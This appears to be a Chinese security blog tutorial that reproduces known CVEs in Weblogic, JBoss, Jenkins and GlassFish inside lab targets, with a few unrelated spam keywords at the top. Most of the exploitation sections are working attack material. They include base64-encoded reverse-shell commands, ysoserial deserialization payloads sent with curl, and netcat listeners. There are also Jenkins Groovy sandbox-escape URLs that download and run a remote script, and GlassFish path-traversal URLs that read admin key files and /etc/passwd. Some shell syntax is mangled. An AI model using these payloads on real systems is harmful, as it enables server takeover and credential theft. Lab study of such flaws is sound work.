一站式做网站系统,wordpress取消邮箱验证,合肥市住房和建设局网站,仓储服务 东莞网站建设 技术支持目录 服务攻防-中间件安全CVE复现WeblogicJenkinsGlassFish漏洞复现中间件-Weblogic安全问题漏洞复现CVE_2017_3506漏洞复现 中间件-JBoos安全问题漏洞复现CVE-2017-12149漏洞复现CVE-2017-7504漏洞复现 中间件-Jenkins安全问题漏洞复现CVE-2017-1000353漏… 目录 服务攻防-中间件安全CVE复现WeblogicJenkinsGlassFish漏洞复现中间件-Weblogic安全问题漏洞复现CVE_2017_3506漏洞复现 中间件-JBoos安全问题漏洞复现CVE-2017-12149漏洞复现CVE-2017-7504漏洞复现 中间件-Jenkins安全问题漏洞复现CVE-2017-1000353漏洞复现CVE-2018-1000861漏洞复现 中间件-Glassfish安全问题漏洞复现CVE-2017-1000028漏洞复现 服务攻防-中间件安全CVE复现WeblogicJenkinsGlassFish漏洞复现 中间件及框架列表 IISApacheNginxTomcatDockerWeblogicJBoosWebSphere Jenkins GlassFishJiraStruts2LaravelSolrShiroThinkphp SpringFlaskjQuery等 1、中间件-Weblogic安全 2、中间件-JBoos安全 3、中间件-Jenkins安全 4、中间件-GlassFish安全 常见中间件的安全测试 1、配置不当-解析弱口令 2、安全机制-特定安全漏洞 3、安全机制-弱口令爆破攻击 4、安全应用-框架特定安全漏洞 中间件安全测试流程 1、判断中间件信息-名称版本三方 2、判断中间件问题-配置不当公开漏洞 3、判断中间件利用-弱口令EXP框架漏洞 应用服务安全测试流程 1、判断服务开放情况-端口扫描组合应用等 2、判断服务类型归属-数据库文件传输通讯等 3、判断服务利用方式-特定漏洞未授权弱口令等 中间件-Weblogic安全问题
详解weblogic详解 介绍 Java应用服务器软件 WebLogic是美国Oracle公司出品的一个application server确切的说是一个基于JAVAEE架构的中间件WebLogic是用于开发、集成、部署和管理大型分布式Web应用、网络应用和数据库应用的Java应用服务器。将Java的动态功能和Java Enterprise标准的安全性引入大型网络应用的开发、集成、部署和管理之中。 探针默认端口7001Weblogic是Oracle公司推出的J2EE应用服务器 安全问题 CVE_2017_3506 CVE_2018_2893 CVE_2018_3245 CVE-2018-2628 反序列化 CVE_2020_14882 CVE_2021_2394 反序列化 CVE-2023-21839 反序列化 … 以上的漏洞基本都可以使用现成熟的工具进行直接攻击利用。
漏洞复现
以CVE_2017_3506为例其他编号漏洞利用基本类似直接上工具点一点~
CVE_2017_3506漏洞复现
靶场vulfocus 开启环境 访问 直接将url信息放入到工具当中进行检测 存在漏洞可直接进行命令执行 其他漏洞编号利用方式类似直接放入到工具当中进行检测存在就存在可直接执行命令或者上传注入等操作。
手工操作复现weblogic反序列漏洞复现
中间件-JBoos安全问题
详解Jboss详解 介绍 J2EE的开放源代码的应用服务器 是一个基于J2EE的开放源代码的应用服务器。 JBoss代码遵循LGPL许可可以在任何商业应用中免费使用。JBoss是一个管理EJB的容器和服务器支持EJB 1.1、EJB 2.0和EJB3的规范。但JBoss核心服务不包括支持servlet/JSP的WEB容器一般与Tomcat或Jetty绑定使用。 Jboss通常占用的端口是10981099444444458080800980838093这 几个Red Hat JBoss Application Server 是一款基于JavaEE的开源应用服务器。 安全问题 CVE-2017-12149 CVE-2017-7504 弱口令 未授权访问 … 漏洞复现
CVE-2017-12149漏洞复现 该漏洞为 Java反序列化错误类型存在于 Jboss 的 HttpInvoker 组件中的 ReadOnlyAccessFilter 过滤器中。该过滤器在没有进行任何安全检查的情况下尝试将来自客户端的数据流进行反序列化从而导致了漏洞。 靶场vulhub 参考JBoss 5.x/6.x 反序列化漏洞
开启环境
访问 漏洞利用
payload
//反弹shell命令
sh -i /dev/tcp/192.168.100.1/8888 01
//base64加密后
bash -c {echo,c2ggLWkgPiYgL2Rldi90Y3AvMTkyLjE2OC4xMDAuMS84ODg4IDAJjE}|{base64,-d}|{bash,-i}
//ysoserial工具利用
java -jar ysoserial-master-30099844c6-1.jar CommonsCollections5 bash -c{echo,c2ggLWkgPiYgL2Rldi90Y3AvMTkyLjE2OC4xMDAuMS84ODg4IDAJjE}|{base64,-d}|{bash,-i} poc.ser
//curl命令进行请求访问发送
curl http://192.168.100.134:8080/invoker/readonly --data-binary poc.ser
//接收端开启监听
nc -lvvp 8888在ysoserial工具目录下生成了poc.ser文件
发送curl请求
监听端成功接收反弹shell成功
CVE-2017-7504漏洞复现 介绍 Red Hat JBoss Application Server 是一款基于JavaEE的开源应用服务器。JBoss AS 4.x及之前版本中JbossMQ实现过程的JMS over HTTP Invocation Layer的HTTPServerILServlet.java文件存在反序列化漏洞远程攻击者可借助特制的序列化数据利用该漏洞执行任意代码。 靶场vulhub 参考JBoss 4.x JBossMQ JMS 反序列化漏洞CVE-2017-7504
开启环境
访问 漏洞利用
//此漏洞和CVE-2017-12149利用方式差不多区别就是请求地址内容不同
payload:
//反弹shell命令
sh -i /dev/tcp/192.168.100.1/8888 01
//base64加密后
bash -c {echo,c2ggLWkgPiYgL2Rldi90Y3AvMTkyLjE2OC4xMDAuMS84ODg4IDAJjE}|{base64,-d}|{bash,-i}
//ysoserial工具利用
java -jar ysoserial-master-30099844c6-1.jar CommonsCollections5 bash -c{echo,c2ggLWkgPiYgL2Rldi90Y3AvMTkyLjE2OC4xMDAuMS84ODg4IDAJjE}|{base64,-d}|{bash,-i} poc.ser
//进行curl请求
curl http://192.168.100.134:8080/jbossmq-httpil/HTTPServerILServlet --data-binary poc.ser
//接收端开启监听
nc -lvvp 8888发送curl请求
监听端成功接收反弹shell成功
中间件-Jenkins安全问题
详解Jenkins详解 介绍 开源软件项目 Jenkins是一个开源软件项目是基于Java开发的一种持续集成工具用于监控持续重复的工作旨在提供一个开放易用的软件平台使软件项目可以进行持续集成。 探针默认端口8080 安全问题 CVE-2017-1000353 CVE-2018-1000861 … 漏洞复现
CVE-2017-1000353漏洞复现
靶场vulfocus 或vulhub 参考Jenkins-CI 远程代码执行漏洞 vulhub环境
vulfocus环境 开启靶场
访问:
漏洞利用 工具地址CVE-2017-1000353 JDK版本需要为jdk-8u291其他版本可能失效无法复现成功 下载地址JDK8
payload
//执行命令创建文件
java -jar CVE-2017-1000353-1.1-SNAPSHOT-all.jar jenkins_poc.ser touch /123.txt
//执行exp
python exploit.py http://192.168.100.134:8080/ jenkins_poc.ser//然后回到我们的靶机中打开终端输入以下命令查看验证是否利用成功
docker ps -a
docker exec -it 838723a23ad0 /bin/bash
ls /反弹shell命令
sh -i /dev/tcp/192.168.100.1/8888 01
//base64加密后
bash -c {echo,c2ggLWkgPiYgL2Rldi90Y3AvMTkyLjE2OC4xMDAuMS84ODg4IDAJjE}|{base64,-d}|{bash,-i}//反弹shell操作
//将刚刚执行创建文件的命令换成该反弹shell命令即可base64加密后的
java -jar CVE-2017-1000353-1.1-SNAPSHOT-all.jar jenkins_poc.ser bash -c {echo,c2ggLWkgPiYgL2Rldi90Y3AvMTkyLjE2OC4xMDAuMS84ODg4IDAJjE}|{base64,-d}|{bash,-i}
//执行exp
python exploit.py http://192.168.100.134:8080/ jenkins_poc.ser//接收端开启监听
nc -lvvp 8888注意JDK版本否则可能无法复现。
CVE-2018-1000861漏洞复现
靶场vulhub 参考Jenkins远程命令执行漏洞 开启环境
访问
漏洞利用 exp下载地址CVE-2018-1000861EXP
//使用exp脚本可直接利用python2下使用
payload
python2 exp.py python2 exp.py http://192.168.100.134:8080/ touch /tmp/123.txt
python2 exp.py http://192.168.100.134:8080/ touch /tmp/test.txt//进入靶场环境进行验证
docker ps
docker exec -it 靶场id /bin/bash
ls /tmp/使用说明
使用方式
验证是否成功 成功创建文件
还可以进行手工测试
手工检测
poc
http://192.168.100.134:8080/securityRealm/user/admin/descriptorByName/org.jenkinsci.plugins.scriptsecurity.sandbox.groovy.SecureGroovyScript/checkScript?sandboxtruevaluepublic%20class%20x%20{public%20x(){%22touch%20/tmp/rumilc%22.execute()}}
payload:
创建文件
//发送以下请求
http://192.168.100.134:8080/securityRealm/user/admin/descriptorByName/org.jenkinsci.plugins.scriptsecurity.sandbox.groovy.SecureGroovyScript/checkScript?sandboxtruevaluepublic%20class%20x%20{public%20x(){%22touch%20/tmp/rumilc%22.execute()}}验证 成功创建
反弹shell
payload
//反弹shell命令进行base64加密
python2 exp.py http://192.168.100.134:8080 bash -c {echo,c2ggLWkgPiYgL2Rldi90Y3AvMTkyLjE2OC4xMDAuMS84ODg4IDAJjE}|{base64,-d}|{bash,-i}
//接收端开启监听
nc -lvvp 8888成功反弹shell
ps:如果不能反弹可在服务端创建文本文件将反弹shell命令写进文本文件当中。然后python开启http服务,观察状态。
//开启http服务
python -m http.server 8080//python2执行exp脚本将远程文件保存至目标主机
python2 exp.py 目标主机 curl -o /tmp/cmd.sh http://xxxx:8080/cmd.txt//python2执行exp脚本使目标主机运行脚本文件反弹shel
python2 exp.py 目标主机 bash /tmp/cmd.shhttp服务端可观察状态
进入靶场验证存在该文件 接下来使用python2脚本exp命令进行执行即可。
还可以手工浏览器访问依次执行
payload
//这里拿本地演示
//将文件保存到目标主机
//http://ip:port/securityRealm/user/admin/descriptorByName/org.jenkinsci.plugins.scriptsecurity.sandbox.groovy.SecureGroovyScript/checkScript?sandboxtruevaluepublic class x {public x(){curl -o /tmp/cmd.sh http://VPSip:8888/cmd.txt.execute()}}
http://192.168.100.134:8080/securityRealm/user/admin/descriptorByName/org.jenkinsci.plugins.scriptsecurity.sandbox.groovy.SecureGroovyScript/checkScript?sandboxtruevaluepublic class x {public x(){curl -o /tmp/cmd.sh http://127.0.0.1:8080/cmd.txt.execute()}}//执行shell脚本
//http://ip:port/securityRealm/user/admin/descriptorByName/org.jenkinsci.plugins.scriptsecurity.sandbox.groovy.SecureGroovyScript/checkScript?sandboxtruevaluepublic class x {public x(){bash /tmp/cmd.sh.execute()}}
http://192.168.100.134:8080/securityRealm/user/admin/descriptorByName/org.jenkinsci.plugins.scriptsecurity.sandbox.groovy.SecureGroovyScript/checkScript?sandboxtruevaluepublic class x {public x(){bash /tmp/cmd.sh.execute()}}访问时浏览器变为空白界面 执行成功
中间件-Glassfish安全问题
介绍 GlassFish详解 一款商业应用服务器 GlassFish 是一款强健的商业兼容应用服务器达到产品级质量可免费用于开发、部署和重新分发。开发者可以免费获得源代码还可以对代码进行更改。 安全问题 CVE-2017-1000028 … 漏洞复现
CVE-2017-1000028漏洞复现
漏洞原理 java语言中会把%c0%ae解析为\uC0AE最后转义为ASCCII字符的.点。利用%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/来向上跳转达到目录穿越、任意文件读取的效果。 靶场vulhub 参考GlassFish 任意文件读取漏洞
开启环境
进入环境访问 环境运行后访问http://your-ip:8080和http://your-ip:4848即可查看web页面。其中8080端口是网站内容4848端口是GlassFish管理中心。
payload:
//读取密码
https://192.168.100.134:4848/theme/META-INF/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%afdomains/domain1/config/admin-keyfile//linux下读取文件
https://192.168.100.134:4848/theme/META-INF/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/etc/passwd//window下读取文件
http://you-ip:4848/theme/META-INF/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/windows/win.ini成功读取密码
成功读取文件
